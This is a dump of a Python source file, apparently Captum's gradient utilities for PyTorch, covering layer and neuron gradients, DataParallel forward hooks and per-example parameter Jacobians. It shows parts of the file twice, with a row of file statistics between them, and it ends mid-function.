key_list = _sort_key_list(list(next(iter(saved_layer.values())).keys()), device_ids)
if gradient_neuron_selector is not None:
assert isinstance(
layer, Module
), "Cannot compute neuron gradients for multiple layers simultaneously!"
inp_grads = _neuron_gradients(
inputs, saved_layer[layer], key_list, gradient_neuron_selector
)
return (
_gather_distributed_tensors(saved_layer[layer], key_list=key_list),
inp_grads,
)
else:
if isinstance(layer, Module):
return _gather_distributed_tensors(saved_layer[layer], key_list=key_list)
else:
return [
_gather_distributed_tensors(saved_layer[curr_layer], key_list=key_list)
for curr_layer in layer
]
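# Hedged usage sketch (toy model and selector are illustrative): passing a
# gradient_neuron_selector makes the helper return both the gathered layer
# evaluations and the gradients of the selected neuron w.r.t. the inputs.
def _example_layer_eval_with_neuron_grads():
    model = torch.nn.Sequential(torch.nn.Linear(3, 4), torch.nn.ReLU())
    inp = torch.randn(2, 3, requires_grad=True)
    evals, inp_grads = _forward_layer_eval_with_neuron_grads(
        model, inp, model[0], gradient_neuron_selector=(1,)
    )
    return evals, inp_grads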
@typing.overload
def compute_layer_gradients_and_eval(
forward_fn: Callable,
layer: Module,
inputs: Union[Tensor, Tuple[Tensor, ...]],
target_ind: TargetType = None,
additional_forward_args: Any = None,
*,
gradient_neuron_selector: Union[int, Tuple[Union[int, slice], ...], Callable],
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
output_fn: Union[None, Callable] = None,
) -> Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...], Tuple[Tensor, ...]]:
...
@typing.overload
def compute_layer_gradients_and_eval(
forward_fn: Callable,
layer: List[Module],
inputs: Union[Tensor, Tuple[Tensor, ...]],
target_ind: TargetType = None,
additional_forward_args: Any = None,
gradient_neuron_selector: None = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
output_fn: Union[None, Callable] = None,
) -> Tuple[List[Tuple[Tensor, ...]], List[Tuple[Tensor, ...]]]:
...
@typing.overload
def compute_layer_gradients_and_eval(
forward_fn: Callable,
layer: Module,
inputs: Union[Tensor, Tuple[Tensor, ...]],
target_ind: TargetType = None,
additional_forward_args: Any = None,
gradient_neuron_selector: None = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
output_fn: Union[None, Callable] = None,
) -> Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...]]:
...
def compute_layer_gradients_and_eval(
forward_fn: Callable,
layer: ModuleOrModuleList,
inputs: Union[Tensor, Tuple[Tensor, ...]],
target_ind: TargetType = None,
additional_forward_args: Any = None,
gradient_neuron_selector: Union[
None, int, Tuple[Union[int, slice], ...], Callable
] = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
output_fn: Union[None, Callable] = None,
) -> Union[
Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...]],
Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...], Tuple[Tensor, ...]],
Tuple[List[Tuple[Tensor, ...]], List[Tuple[Tensor, ...]]],
]:
r"""
Computes gradients of the output with respect to a given layer as well
as the output evaluation of the layer for an arbitrary forward function
and given input.
    For data parallel models, hooks are executed once per device, so we
need to internally combine the separated tensors from devices by
concatenating based on device_ids. Any necessary gradients must be taken
with respect to each independent batched tensor, so the gradients are
computed and combined appropriately.
More information regarding the behavior of forward hooks with DataParallel
models can be found in the PyTorch data parallel documentation. We maintain
the separate inputs in a dictionary protected by a lock, analogous to the
gather implementation for the core PyTorch DataParallel implementation.
NOTE: To properly handle inplace operations, a clone of the layer output
is stored. This structure inhibits execution of a backward hook on the last
module for the layer output when computing the gradient with respect to
the input, since we store an intermediate clone, as
opposed to the true module output. If backward module hooks are necessary
for the final module when computing input gradients, utilize
_forward_layer_eval_with_neuron_grads instead.
Args:
        forward_fn: forward function. This can be, for example, the model's
                    forward function.
        layer: Layer for which gradients / output will be evaluated.
        inputs: Input at which gradients are evaluated,
                    will be passed to forward_fn.
        target_ind: Index of the target class for which gradients
                    must be computed (classification only).
        output_fn: An optional function that is applied to the layer inputs or
                    outputs depending on whether `attribute_to_layer_input` is
                    set to `True` or `False`.
        additional_forward_args: Additional input arguments that the forward
                    function requires. It takes an empty tuple (no additional
                    arguments) if no additional arguments are required.
Returns:
2-element tuple of **gradients**, **evals**:
- **gradients**:
Gradients of output with respect to target layer output.
- **evals**:
Target layer output for given input.
"""
with torch.autograd.set_grad_enabled(True):
# saved_layer is a dictionary mapping device to a tuple of
# layer evaluations on that device.
saved_layer, output = _forward_layer_distributed_eval(
forward_fn,
inputs,
layer,
target_ind=target_ind,
additional_forward_args=additional_forward_args,
attribute_to_layer_input=attribute_to_layer_input,
forward_hook_with_return=True,
require_layer_grads=True,
)
assert output[0].numel() == 1, (
"Target not provided when necessary, cannot"
" take gradient with respect to multiple outputs."
)
device_ids = _extract_device_ids(forward_fn, saved_layer, device_ids)
# Identifies correct device ordering based on device ids.
# key_list is a list of devices in appropriate ordering for concatenation.
# If only one key exists (standard model), key list simply has one element.
key_list = _sort_key_list(
list(next(iter(saved_layer.values())).keys()), device_ids
)
all_outputs: Union[Tuple[Tensor, ...], List[Tuple[Tensor, ...]]]
if isinstance(layer, Module):
all_outputs = _reduce_list(
[
saved_layer[layer][device_id]
if output_fn is None
else output_fn(saved_layer[layer][device_id])
for device_id in key_list
]
)
else:
all_outputs = [
_reduce_list(
[
saved_layer[single_layer][device_id]
if output_fn is None
else output_fn(saved_layer[single_layer][device_id])
for device_id in key_list
]
)
for single_layer in layer
]
all_layers: List[Module] = [layer] if isinstance(layer, Module) else layer
grad_inputs = tuple(
layer_tensor
for single_layer in all_layers
for device_id in key_list
for layer_tensor in saved_layer[single_layer][device_id]
)
saved_grads = torch.autograd.grad(torch.unbind(output), grad_inputs)
offset = 0
all_grads: List[Tuple[Tensor, ...]] = []
for single_layer in all_layers:
num_tensors = len(next(iter(saved_layer[single_layer].values())))
curr_saved_grads = [
saved_grads[i : i + num_tensors]
for i in range(
offset, offset + len(key_list) * num_tensors, num_tensors
)
]
offset += len(key_list) * num_tensors
if output_fn is not None:
curr_saved_grads = [
output_fn(curr_saved_grad) for curr_saved_grad in curr_saved_grads
]
all_grads.append(_reduce_list(curr_saved_grads))
layer_grads: Union[Tuple[Tensor, ...], List[Tuple[Tensor, ...]]]
layer_grads = all_grads
if isinstance(layer, Module):
layer_grads = all_grads[0]
if gradient_neuron_selector is not None:
assert isinstance(
layer, Module
), "Cannot compute neuron gradients for multiple layers simultaneously!"
inp_grads = _neuron_gradients(
inputs, saved_layer[layer], key_list, gradient_neuron_selector
)
return (
cast(Tuple[Tensor, ...], layer_grads),
cast(Tuple[Tensor, ...], all_outputs),
inp_grads,
)
return layer_grads, all_outputs # type: ignore
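# Hedged usage sketch (hypothetical two-class toy model): with an integer
# target the output reduces to one scalar per example, so the helper can
# return gradients of that target w.r.t. the chosen layer along with the
# layer's evaluations.
def _example_compute_layer_gradients_and_eval():
    model = torch.nn.Sequential(torch.nn.Linear(3, 3), torch.nn.Linear(3, 2))
    layer_grads, layer_evals = compute_layer_gradients_and_eval(
        model, model[0], torch.randn(1, 3), target_ind=0
    )
    return layer_grads, layer_evals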
def construct_neuron_grad_fn(
layer: Module,
neuron_selector: Union[int, Tuple[Union[int, slice], ...], Callable],
device_ids: Union[None, List[int]] = None,
attribute_to_neuron_input: bool = False,
) -> Callable:
def grad_fn(
forward_fn: Callable,
inputs: TensorOrTupleOfTensorsGeneric,
target_ind: TargetType = None,
additional_forward_args: Any = None,
) -> Tuple[Tensor, ...]:
_, grads = _forward_layer_eval_with_neuron_grads(
forward_fn,
inputs,
layer,
additional_forward_args,
gradient_neuron_selector=neuron_selector,
device_ids=device_ids,
attribute_to_layer_input=attribute_to_neuron_input,
)
return grads
return grad_fn
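# Hedged usage sketch: the returned grad_fn has the same call signature as
# compute_gradients, so it can stand in wherever input gradients are taken.
# The toy layer and neuron index are illustrative.
def _example_construct_neuron_grad_fn():
    model = torch.nn.Sequential(torch.nn.Linear(3, 4))
    grad_fn = construct_neuron_grad_fn(model[0], neuron_selector=(2,))
    inp = torch.randn(2, 3, requires_grad=True)
    return grad_fn(model, inp)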
def _compute_jacobian_wrt_params(
model: Module,
inputs: Union[Tuple[Tensor], Tensor],
labels: Optional[Tensor] = None,
loss_fn: Optional[Union[Module, Callable]] = None,
) -> Tuple[Tensor, ...]:
r"""
    Computes the Jacobian of a batch of test examples given a model and an
    optional loss function with target labels. This method is equivalent to
    calculating the gradient for every individual example in the minibatch.
Args:
model (torch.nn.Module): The trainable model providing the forward pass
inputs (Tensor): The minibatch for which the forward pass is computed.
The dimensions of input are (N, *) where N is the batch_size.
The input must have a batch dimension, even if batch_size = 1.
labels (Tensor or None): Labels for input if computing a loss function.
loss_fn (torch.nn.Module or Callable or None): The loss function. If a library
defined loss function is provided, it would be expected to be a
torch.nn.Module. If a custom loss is provided, it can be either type,
but must behave as a library loss function would if `reduction='none'`.
Returns:
grads (Tuple of Tensor): Returns the Jacobian for the minibatch as a
tuple of gradients corresponding to the tuple of trainable parameters
                returned by `model.parameters()`. Each object grads[i] refers to the
gradients for the parameters in the i-th trainable layer of the model.
Each grads[i] object is a tensor with the gradients for the `inputs`
batch. For example, grads[i][j] would reference the gradients for the
parameters of the i-th layer, for the j-th member of the minibatch.
"""
with torch.autograd.set_grad_enabled(True):
out = model(inputs)
assert out.dim() != 0, "Please ensure model output has at least one dimension."
if labels is not None and loss_fn is not None:
loss = loss_fn(out, labels)
if hasattr(loss_fn, "reduction"):
msg0 = "Please ensure loss_fn.reduction is set to `none`"
assert loss_fn.reduction == "none", msg0 # type: ignore
else:
msg1 = (
"Loss function is applying a reduction. Please ensure "
f"Output shape: {out.shape} and Loss shape: {loss.shape} "
"are matching."
)
assert loss.dim() != 0, msg1
assert out.shape[0] == loss.shape[0], msg1
out = loss
grads_list = [
torch.autograd.grad(
outputs=out[i],
inputs=model.parameters(), # type: ignore
grad_outputs=torch.ones_like(out[i]),
retain_graph=True,
)
for i in range(out.shape[0])
]
grads = tuple([torch.stack(x) for x in zip(*grads_list)])
return tuple(grads)
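# Hedged usage sketch: per-example parameter gradients for a toy linear model
# with an unreduced MSE loss (reduction='none', as the assertions above
# require).
def _example_jacobian_wrt_params():
    model = torch.nn.Linear(3, 1)
    inputs = torch.randn(4, 3)
    labels = torch.randn(4, 1)
    loss_fn = torch.nn.MSELoss(reduction="none")
    grads = _compute_jacobian_wrt_params(model, inputs, labels, loss_fn)
    # grads[0] has shape (4, 1, 3): one weight gradient per example.
    return grads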
def _compute_jacobian_wrt_params_autograd_hacks(
model: Module,
inputs: Union[Tuple[Tensor], Tensor],
labels: Optional[Tensor] = None,
loss_fn: Optional[Module] = None,
reduction_type: Optional[str] = "sum",
) -> Tuple[Any, ...]:
r"""
    NOT SUPPORTED FOR OPEN SOURCE. This method uses an internal 'hack' and is currently
not supported.
    Computes the Jacobian of a batch of test examples given a model and an
    optional loss function with target labels. This method uses autograd_hacks
    to fully vectorize the Jacobian calculation. Currently, only linear and
    conv2d layers are supported.
User must `add_hooks(model)` before calling this function.
Args:
model (torch.nn.Module): The trainable model providing the forward pass
inputs (Tensor): The minibatch for which the forward pass is computed.
The dimensions of input are (N, *) where N is the batch_size.
The input must have a batch dimension, even if batch_size = 1.
labels (Tensor or None): Labels for input if computing a loss function.
loss_fn (torch.nn.Module or Callable or None): The loss function. If a library
defined loss function is provided, it would be expected to be a
torch.nn.Module. If a custom loss is provided, it can be either type,
but must behave as a library loss function would if `reduction='sum'` or
`reduction='mean'`.
reduction_type (str): The type of reduction applied. If a loss_fn is passed,
this should match `loss_fn.reduction`. Else if gradients are being
computed on direct model outputs (scores), then 'sum' should be used.
Defaults to 'sum'.
Returns:
grads (Tuple of Tensor): Returns the Jacobian for the minibatch as a
tuple of gradients corresponding to the tuple of trainable parameters
                returned by `model.parameters()`. Each object grads[i] refers to the
gradients for the parameters in the i-th trainable layer of the model.
Each grads[i] object is a tensor with the gradients for the `inputs`
batch. For example, grads[i][j] would reference the gradients for the
parameters of the i-th layer, for the j-th member of the minibatch.
"""
from captum._utils.fb import autograd_hacks
with torch.autograd.set_grad_enabled(True):
autograd_hacks.add_hooks(model)
out = model(inputs)
assert out.dim() != 0, "Please ensure model output has at least one dimension."
if labels is not None and loss_fn is not None:
loss = loss_fn(out, labels)
if hasattr(loss_fn, "reduction"):
msg0 = "Please ensure loss_fn.reduction is set to `sum` or `mean`"
assert loss_fn.reduction != "none", msg0
msg1 = (
f"loss_fn.reduction ({loss_fn.reduction}) does not match reduction "
f"type ({reduction_type}). Please ensure they are matching."
)
assert loss_fn.reduction == reduction_type, msg1
msg2 = (
"Please ensure custom loss function is applying either a "
"sum or mean reduction."
)
assert out.shape != loss.shape, msg2
if reduction_type != "sum" and reduction_type != "mean":
raise ValueError(
f"{reduction_type} is not a valid value for reduction_type. "
"Must be either 'sum' or 'mean'."
)
out = loss
model.zero_grad()
out.backward(gradient=torch.ones_like(out))
autograd_hacks.compute_grad1(model, loss_type=reduction_type)
grads = tuple(
param.grad1 # type: ignore
for param in model.parameters()
if hasattr(param, "grad1")
)
autograd_hacks.clear_backprops(model)
autograd_hacks.remove_hooks(model)
return grads
| 39.730546
| 148
| 0.639646
|
import threading
import typing
import warnings
from collections import defaultdict
from typing import Any, Callable, Dict, List, Optional, Tuple, Union, cast
import torch
from captum._utils.common import (
_reduce_list,
_run_forward,
_sort_key_list,
_verify_select_neuron,
)
from captum._utils.typing import (
Literal,
ModuleOrModuleList,
TargetType,
TensorOrTupleOfTensorsGeneric,
)
from torch import Tensor, device
from torch.nn import Module
def apply_gradient_requirements(
inputs: Tuple[Tensor, ...], warn: bool = True
) -> List[bool]:
assert isinstance(
inputs, tuple
), "Inputs should be wrapped in a tuple prior to preparing for gradients"
grad_required = []
for index, input in enumerate(inputs):
assert isinstance(input, torch.Tensor), "Given input is not a torch.Tensor"
grad_required.append(input.requires_grad)
inputs_dtype = input.dtype
if not inputs_dtype.is_floating_point and not (
hasattr(inputs_dtype, "is_complex") and inputs_dtype.is_complex
):
if warn:
                warnings.warn(
                    "Input Tensor %d has a dtype of %s. Gradients cannot "
                    "be activated for these data types."
                    % (index, str(inputs_dtype))
                )
elif not input.requires_grad:
if warn:
warnings.warn(
"Input Tensor %d did not already require gradients, "
"required_grads has been set automatically." % index
)
input.requires_grad_()
return grad_required
def undo_gradient_requirements(
inputs: Tuple[Tensor, ...], grad_required: List[bool]
) -> None:
assert isinstance(
inputs, tuple
), "Inputs should be wrapped in a tuple prior to preparing for gradients."
assert len(inputs) == len(
grad_required
), "Input tuple length should match gradient mask."
for index, input in enumerate(inputs):
assert isinstance(input, torch.Tensor), "Given input is not a torch.Tensor"
if not grad_required[index]:
input.requires_grad_(False)
def compute_gradients(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
target_ind: TargetType = None,
additional_forward_args: Any = None,
) -> Tuple[Tensor, ...]:
with torch.autograd.set_grad_enabled(True):
outputs = _run_forward(forward_fn, inputs, target_ind, additional_forward_args)
assert outputs[0].numel() == 1, (
"Target not provided when necessary, cannot"
" take gradient with respect to multiple outputs."
)
        grads = torch.autograd.grad(torch.unbind(outputs), inputs, create_graph=True, retain_graph=True)
return grads
def _neuron_gradients(
inputs: Union[Tensor, Tuple[Tensor, ...]],
saved_layer: Dict[device, Tuple[Tensor, ...]],
key_list: List[device],
gradient_neuron_selector: Union[int, Tuple[Union[int, slice], ...], Callable],
) -> Tuple[Tensor, ...]:
with torch.autograd.set_grad_enabled(True):
gradient_tensors = []
for key in key_list:
current_out_tensor = _verify_select_neuron(
saved_layer[key], gradient_neuron_selector
)
gradient_tensors.append(
torch.autograd.grad(
torch.unbind(current_out_tensor)
if current_out_tensor.numel() > 1
else current_out_tensor,
inputs,
)
)
_total_gradients = _reduce_list(gradient_tensors, sum)
return _total_gradients
@typing.overload
def _forward_layer_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: Module,
additional_forward_args: Any = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
grad_enabled: bool = False,
) -> Tuple[Tensor, ...]:
...
@typing.overload
def _forward_layer_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: List[Module],
additional_forward_args: Any = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
grad_enabled: bool = False,
) -> List[Tuple[Tensor, ...]]:
...
def _forward_layer_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: ModuleOrModuleList,
additional_forward_args: Any = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
grad_enabled: bool = False,
) -> Union[Tuple[Tensor, ...], List[Tuple[Tensor, ...]]]:
return _forward_layer_eval_with_neuron_grads(
forward_fn,
inputs,
layer,
additional_forward_args=additional_forward_args,
gradient_neuron_selector=None,
grad_enabled=grad_enabled,
device_ids=device_ids,
attribute_to_layer_input=attribute_to_layer_input,
)
@typing.overload
def _forward_layer_distributed_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: ModuleOrModuleList,
target_ind: TargetType = None,
additional_forward_args: Any = None,
attribute_to_layer_input: bool = False,
forward_hook_with_return: Literal[False] = False,
require_layer_grads: bool = False,
) -> Dict[Module, Dict[device, Tuple[Tensor, ...]]]:
...
@typing.overload
def _forward_layer_distributed_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: ModuleOrModuleList,
target_ind: TargetType = None,
additional_forward_args: Any = None,
attribute_to_layer_input: bool = False,
*,
forward_hook_with_return: Literal[True],
require_layer_grads: bool = False,
) -> Tuple[Dict[Module, Dict[device, Tuple[Tensor, ...]]], Tensor]:
...
def _forward_layer_distributed_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: ModuleOrModuleList,
target_ind: TargetType = None,
additional_forward_args: Any = None,
attribute_to_layer_input: bool = False,
forward_hook_with_return: bool = False,
require_layer_grads: bool = False,
) -> Union[
Tuple[Dict[Module, Dict[device, Tuple[Tensor, ...]]], Tensor],
Dict[Module, Dict[device, Tuple[Tensor, ...]]],
]:
saved_layer: Dict[Module, Dict[device, Tuple[Tensor, ...]]] = defaultdict(dict)
lock = threading.Lock()
all_layers: List[Module] = [layer] if isinstance(layer, Module) else layer
def hook_wrapper(original_module):
def forward_hook(module, inp, out=None):
eval_tsrs = inp if attribute_to_layer_input else out
is_eval_tuple = isinstance(eval_tsrs, tuple)
if not is_eval_tuple:
eval_tsrs = (eval_tsrs,)
if require_layer_grads:
apply_gradient_requirements(eval_tsrs, warn=False)
with lock:
nonlocal saved_layer
if forward_hook_with_return:
saved_layer[original_module][eval_tsrs[0].device] = eval_tsrs
eval_tsrs_to_return = tuple(
eval_tsr.clone() for eval_tsr in eval_tsrs
)
if not is_eval_tuple:
eval_tsrs_to_return = eval_tsrs_to_return[0]
return eval_tsrs_to_return
else:
saved_layer[original_module][eval_tsrs[0].device] = tuple(
eval_tsr.clone() for eval_tsr in eval_tsrs
)
return forward_hook
all_hooks = []
try:
for single_layer in all_layers:
if attribute_to_layer_input:
all_hooks.append(
single_layer.register_forward_pre_hook(hook_wrapper(single_layer))
)
else:
all_hooks.append(
single_layer.register_forward_hook(hook_wrapper(single_layer))
)
output = _run_forward(
forward_fn,
inputs,
target=target_ind,
additional_forward_args=additional_forward_args,
)
finally:
for hook in all_hooks:
hook.remove()
if len(saved_layer) == 0:
raise AssertionError("Forward hook did not obtain any outputs for given layer")
if forward_hook_with_return:
return saved_layer, output
return saved_layer
def _gather_distributed_tensors(
saved_layer: Dict[device, Tuple[Tensor, ...]],
device_ids: Union[None, List[int]] = None,
key_list: Union[None, List[device]] = None,
) -> Tuple[Tensor, ...]:
if key_list is None:
key_list = _sort_key_list(list(saved_layer.keys()), device_ids)
return _reduce_list([saved_layer[device_id] for device_id in key_list])
def _extract_device_ids(
forward_fn: Callable,
saved_layer: Dict[Module, Dict[device, Tuple[Tensor, ...]]],
device_ids: Union[None, List[int]],
) -> Union[None, List[int]]:
# Multiple devices / keys implies a DataParallel model, so we look for
# device IDs if given or available from forward function
# (DataParallel model object).
if (
max(len(saved_layer[single_layer]) for single_layer in saved_layer) > 1
and device_ids is None
):
if (
hasattr(forward_fn, "device_ids")
and cast(Any, forward_fn).device_ids is not None
):
device_ids = cast(Any, forward_fn).device_ids
else:
raise AssertionError(
"Layer tensors are saved on multiple devices, however unable to access"
" device ID list from the `forward_fn`. Device ID list must be"
" accessible from `forward_fn`. For example, they can be retrieved"
" if `forward_fn` is a model of type `DataParallel`. It is used"
" for identifying device batch ordering."
)
return device_ids
@typing.overload
def _forward_layer_eval_with_neuron_grads(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: Module,
additional_forward_args: Any = None,
*,
gradient_neuron_selector: Union[int, Tuple[Union[int, slice], ...], Callable],
grad_enabled: bool = False,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
) -> Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...]]:
...
@typing.overload
def _forward_layer_eval_with_neuron_grads(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: Module,
additional_forward_args: Any = None,
gradient_neuron_selector: None = None,
grad_enabled: bool = False,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
) -> Tuple[Tensor, ...]:
...
@typing.overload
def _forward_layer_eval_with_neuron_grads(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: List[Module],
additional_forward_args: Any = None,
gradient_neuron_selector: None = None,
grad_enabled: bool = False,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
) -> List[Tuple[Tensor, ...]]:
...
def _forward_layer_eval_with_neuron_grads(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: ModuleOrModuleList,
additional_forward_args: Any = None,
gradient_neuron_selector: Union[
None, int, Tuple[Union[int, slice], ...], Callable
] = None,
grad_enabled: bool = False,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
) -> Union[
Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...]],
Tuple[Tensor, ...],
List[Tuple[Tensor, ...]],
]:
grad_enabled = True if gradient_neuron_selector is not None else grad_enabled
with torch.autograd.set_grad_enabled(grad_enabled):
saved_layer = _forward_layer_distributed_eval(
forward_fn,
inputs,
layer,
additional_forward_args=additional_forward_args,
attribute_to_layer_input=attribute_to_layer_input,
)
device_ids = _extract_device_ids(forward_fn, saved_layer, device_ids)
# Identifies correct device ordering based on device ids.
# key_list is a list of devices in appropriate ordering for concatenation.
# If only one key exists (standard model), key list simply has one element.
key_list = _sort_key_list(list(next(iter(saved_layer.values())).keys()), device_ids)
if gradient_neuron_selector is not None:
assert isinstance(
layer, Module
), "Cannot compute neuron gradients for multiple layers simultaneously!"
inp_grads = _neuron_gradients(
inputs, saved_layer[layer], key_list, gradient_neuron_selector
)
return (
_gather_distributed_tensors(saved_layer[layer], key_list=key_list),
inp_grads,
)
else:
if isinstance(layer, Module):
return _gather_distributed_tensors(saved_layer[layer], key_list=key_list)
else:
return [
_gather_distributed_tensors(saved_layer[curr_layer], key_list=key_list)
for curr_layer in layer
]
@typing.overload
def compute_layer_gradients_and_eval(
forward_fn: Callable,
layer: Module,
inputs: Union[Tensor, Tuple[Tensor, ...]],
target_ind: TargetType = None,
additional_forward_args: Any = None,
*,
gradient_neuron_selector: Union[int, Tuple[Union[int, slice], ...], Callable],
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
output_fn: Union[None, Callable] = None,
) -> Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...], Tuple[Tensor, ...]]:
...
@typing.overload
def compute_layer_gradients_and_eval(
forward_fn: Callable,
layer: List[Module],
inputs: Union[Tensor, Tuple[Tensor, ...]],
target_ind: TargetType = None,
additional_forward_args: Any = None,
gradient_neuron_selector: None = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
output_fn: Union[None, Callable] = None,
) -> Tuple[List[Tuple[Tensor, ...]], List[Tuple[Tensor, ...]]]:
...
@typing.overload
def compute_layer_gradients_and_eval(
forward_fn: Callable,
layer: Module,
inputs: Union[Tensor, Tuple[Tensor, ...]],
target_ind: TargetType = None,
additional_forward_args: Any = None,
gradient_neuron_selector: None = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
output_fn: Union[None, Callable] = None,
) -> Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...]]:
...
def compute_layer_gradients_and_eval(
forward_fn: Callable,
layer: ModuleOrModuleList,
inputs: Union[Tensor, Tuple[Tensor, ...]],
target_ind: TargetType = None,
additional_forward_args: Any = None,
gradient_neuron_selector: Union[
None, int, Tuple[Union[int, slice], ...], Callable
] = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
output_fn: Union[None, Callable] = None,
) -> Union[
Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...]],
Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...], Tuple[Tensor, ...]],
Tuple[List[Tuple[Tensor, ...]], List[Tuple[Tensor, ...]]],
]:
with torch.autograd.set_grad_enabled(True):
# saved_layer is a dictionary mapping device to a tuple of
# layer evaluations on that device.
saved_layer, output = _forward_layer_distributed_eval(
forward_fn,
inputs,
layer,
target_ind=target_ind,
additional_forward_args=additional_forward_args,
attribute_to_layer_input=attribute_to_layer_input,
forward_hook_with_return=True,
require_layer_grads=True,
)
assert output[0].numel() == 1, (
"Target not provided when necessary, cannot"
" take gradient with respect to multiple outputs."
)
device_ids = _extract_device_ids(forward_fn, saved_layer, device_ids)
# Identifies correct device ordering based on device ids.
# key_list is a list of devices in appropriate ordering for concatenation.
# If only one key exists (standard model), key list simply has one element.
key_list = _sort_key_list(
list(next(iter(saved_layer.values())).keys()), device_ids
)
all_outputs: Union[Tuple[Tensor, ...], List[Tuple[Tensor, ...]]]
if isinstance(layer, Module):
all_outputs = _reduce_list(
[
saved_layer[layer][device_id]
if output_fn is None
else output_fn(saved_layer[layer][device_id])
for device_id in key_list
]
)
else:
all_outputs = [
_reduce_list(
[
saved_layer[single_layer][device_id]
if output_fn is None
else output_fn(saved_layer[single_layer][device_id])
for device_id in key_list
]
)
for single_layer in layer
]
all_layers: List[Module] = [layer] if isinstance(layer, Module) else layer
grad_inputs = tuple(
layer_tensor
for single_layer in all_layers
for device_id in key_list
for layer_tensor in saved_layer[single_layer][device_id]
)
saved_grads = torch.autograd.grad(torch.unbind(output), grad_inputs)
offset = 0
all_grads: List[Tuple[Tensor, ...]] = []
for single_layer in all_layers:
num_tensors = len(next(iter(saved_layer[single_layer].values())))
curr_saved_grads = [
saved_grads[i : i + num_tensors]
for i in range(
offset, offset + len(key_list) * num_tensors, num_tensors
)
]
offset += len(key_list) * num_tensors
if output_fn is not None:
curr_saved_grads = [
output_fn(curr_saved_grad) for curr_saved_grad in curr_saved_grads
]
all_grads.append(_reduce_list(curr_saved_grads))
layer_grads: Union[Tuple[Tensor, ...], List[Tuple[Tensor, ...]]]
layer_grads = all_grads
if isinstance(layer, Module):
layer_grads = all_grads[0]
if gradient_neuron_selector is not None:
assert isinstance(
layer, Module
), "Cannot compute neuron gradients for multiple layers simultaneously!"
inp_grads = _neuron_gradients(
inputs, saved_layer[layer], key_list, gradient_neuron_selector
)
return (
cast(Tuple[Tensor, ...], layer_grads),
cast(Tuple[Tensor, ...], all_outputs),
inp_grads,
)
return layer_grads, all_outputs # type: ignore
def construct_neuron_grad_fn(
layer: Module,
neuron_selector: Union[int, Tuple[Union[int, slice], ...], Callable],
device_ids: Union[None, List[int]] = None,
attribute_to_neuron_input: bool = False,
) -> Callable:
def grad_fn(
forward_fn: Callable,
inputs: TensorOrTupleOfTensorsGeneric,
target_ind: TargetType = None,
additional_forward_args: Any = None,
) -> Tuple[Tensor, ...]:
_, grads = _forward_layer_eval_with_neuron_grads(
forward_fn,
inputs,
layer,
additional_forward_args,
gradient_neuron_selector=neuron_selector,
device_ids=device_ids,
attribute_to_layer_input=attribute_to_neuron_input,
)
return grads
return grad_fn
def _compute_jacobian_wrt_params(
model: Module,
inputs: Union[Tuple[Tensor], Tensor],
labels: Optional[Tensor] = None,
loss_fn: Optional[Union[Module, Callable]] = None,
) -> Tuple[Tensor, ...]:
with torch.autograd.set_grad_enabled(True):
out = model(inputs)
assert out.dim() != 0, "Please ensure model output has at least one dimension."
if labels is not None and loss_fn is not None:
loss = loss_fn(out, labels)
if hasattr(loss_fn, "reduction"):
msg0 = "Please ensure loss_fn.reduction is set to `none`"
assert loss_fn.reduction == "none", msg0 # type: ignore
else:
msg1 = (
"Loss function is applying a reduction. Please ensure "
f"Output shape: {out.shape} and Loss shape: {loss.shape} "
"are matching."
)
assert loss.dim() != 0, msg1
assert out.shape[0] == loss.shape[0], msg1
out = loss
grads_list = [
torch.autograd.grad(
outputs=out[i],
inputs=model.parameters(), # type: ignore
grad_outputs=torch.ones_like(out[i]),
retain_graph=True,
)
for i in range(out.shape[0])
]
grads = tuple([torch.stack(x) for x in zip(*grads_list)])
return tuple(grads)
def _compute_jacobian_wrt_params_autograd_hacks(
model: Module,
inputs: Union[Tuple[Tensor], Tensor],
labels: Optional[Tensor] = None,
loss_fn: Optional[Module] = None,
reduction_type: Optional[str] = "sum",
) -> Tuple[Any, ...]:
from captum._utils.fb import autograd_hacks
with torch.autograd.set_grad_enabled(True):
autograd_hacks.add_hooks(model)
out = model(inputs)
assert out.dim() != 0, "Please ensure model output has at least one dimension."
if labels is not None and loss_fn is not None:
loss = loss_fn(out, labels)
